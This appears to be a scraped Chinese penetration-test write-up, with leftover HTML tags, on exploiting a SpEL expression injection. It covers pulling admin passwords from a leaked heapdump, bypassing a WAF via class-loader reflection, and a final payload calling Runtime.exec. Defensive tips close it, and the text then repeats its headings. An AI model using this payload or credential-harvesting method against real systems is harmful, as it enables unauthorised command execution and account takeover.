SPEL表达式注入漏洞挖掘与利用技术分析<\/h1>

概述<\/h2>
本文基于一次真实渗透测试案例，详细分析SPEL表达式注入漏洞的发现、利用和绕过技术。重点包含信息收集、漏洞发现、WAF绕过和最终利用的全过程。<\/p>

信息收集阶段<\/h2>

初始探测<\/h3>

目标站点进行常规信息收集<\/li>
弱密码爆破尝试未果<\/li>

前台接口分析未发现明显漏洞<\/li> <\/ul>

关键发现：Heapdump泄露<\/h3>

目录扫描发现heapdump文件泄露<\/li>
Heapdump包含应用程序堆内存中的所有对象和状态<\/li>

使用专用工具分析heapdump文件：

https:\/\/github.com\/wyzxxz\/heapdump_tool
<\/span><\/span><\/code><\/pre><\/li>
搜索关键词"password"成功提取管理员凭证<\/li>
<\/ul>
漏洞发现过程<\/h2>
接口分析<\/h3>

获取管理员权限后访问70+内部接口<\/li>
发现关键接口参数：expr<\/code><\/li>
参数特征表明可能为表达式注入点<\/li>
<\/ul>
表达式类型识别<\/h3>
通过测试确定表达式类型：<\/p>



表达式类型<\/th>
特征<\/th>
测试结果<\/th>
<\/tr>
<\/thead>


SPEL表达式<\/td>
以#开头引用变量<\/td>
最终确认<\/td>
<\/tr>

EL表达式<\/td>
${}或#{}格式<\/td>
计算失败<\/td>
<\/tr>

OGNL表达式<\/td>
@class@method()形式<\/td>
未匹配<\/td>
<\/tr>
<\/tbody>
<\/table>
SPEL表达式基础语法<\/h3>
#<\/span>variable \/\/ 引用变量
<\/span><\/span><\/span><\/span>T(<\/span>java.<\/span>lang<\/span>.<\/span>Math<\/span>).<\/span>max<\/span>(<\/span>1<\/span>,<\/span>2<\/span>)<\/span> \/\/ 调用静态方法
<\/span><\/span><\/span><\/span>new<\/span> java.<\/span>lang<\/span>.<\/span>String<\/span>(<\/span>'<\/span>abc'<\/span>)<\/span> \/\/ 创建对象
<\/span><\/span><\/span><\/span>#<\/span>obj.<\/span>getName<\/span>()<\/span> \/\/ 方法调用
<\/span><\/span><\/span><\/span>#<\/span>list[<\/span>0<\/span>]<\/span> \/\/ 集合访问
<\/span><\/span><\/span><\/span>condition ?<\/span> trueVal :<\/span> falseVal \/\/ 三元运算符
<\/span><\/span><\/span><\/code><\/pre>WAF绕过技术<\/h2>
黑名单识别<\/h3>

new<\/code> 关键字被过滤<\/li>
T(<\/code> 模式被阻断<\/li>
直接实例化方法全部被禁止<\/li>
<\/ul>
源码审计与绕过<\/h3>
通过分析getClass()<\/code>方法源码发现替代方案：<\/p>
\/\/ 原始反射方法被阻断
<\/span><\/span><\/span><\/span>getClass().<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>)<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 替代方案：使用getSuperclass()
<\/span><\/span><\/span><\/span>getClass().<\/span>getSuperclass<\/span>()<\/span>
<\/span><\/span><\/code><\/pre>类加载器利用<\/h3>
通过获取类加载器间接加载所需类：<\/p>
\/\/ 获取类加载器路径
<\/span><\/span><\/span><\/span>getClass().<\/span>getClassLoader<\/span>()<\/span>
<\/span><\/span>\/\/ 加载Runtime类
<\/span><\/span><\/span><\/span>getClass().<\/span>getClassLoader<\/span>().<\/span>loadClass<\/span>(<\/span>"java.lang.Runtime"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>完整利用链<\/h2>
环境确认<\/h3>
\/\/ 测试表达式计算
<\/span><\/span><\/span><\/span>expr=<\/span>#<\/span>root.<\/span>length<\/span>()-<\/span>1<\/span> \/\/ 回显9，确认注入点
<\/span><\/span><\/span><\/code><\/pre>绕过WAF执行命令<\/h3>
\/\/ 最终payload构造
<\/span><\/span><\/span><\/span>expr=<\/span>#<\/span>this<\/span>.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>().<\/span>loadClass<\/span>(<\/span>"java.lang.Runtime"<\/span>).<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"whoami"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>技术要点总结<\/h2>

信息收集是关键<\/strong>：Heapdump泄露往往包含敏感信息<\/li>
接口参数分析<\/strong>：注意expr<\/code>、expression<\/code>等参数名<\/li>
表达式类型识别<\/strong>：通过基础语法测试确定表达式类型<\/li>
WAF绕过思路<\/strong>：

审计源码寻找替代方法<\/li>
使用getSuperclass()替代forName()<\/li>
通过类加载器间接加载类<\/li>
<\/ul>
<\/li>
利用链构造<\/strong>：逐步构建从类加载到命令执行的完整链<\/li>
<\/ol>
防御建议<\/h2>

避免Heapdump文件泄露<\/li>
对表达式输入进行严格过滤和验证<\/li>
使用安全沙箱环境执行表达式<\/li>
定期进行安全代码审计<\/li>
实施最小权限原则<\/li>
<\/ol>
通过本案例可以看出，漏洞挖掘需要结合细致的信息收集、源码理解能力和创造性的绕过思路。这种深度渗透方法适用于企业级应用的安全测试。<\/p>

SPEL表达式注入漏洞挖掘与利用技术分析<\/h1>

概述<\/h2> 本文基于一次真实渗透测试案例，详细分析SPEL表达式注入漏洞的发现、利用和绕过技术。重点包含信息收集、漏洞发现、WAF绕过和最终利用的全过程。<\/p>

信息收集阶段<\/h2>

漏洞发现过程<\/h2>

WAF绕过技术<\/h2>

完整利用链<\/h2>

概述<\/h2>
本文基于一次真实渗透测试案例，详细分析SPEL表达式注入漏洞的发现、利用和绕过技术。重点包含信息收集、漏洞发现、WAF绕过和最终利用的全过程。<\/p>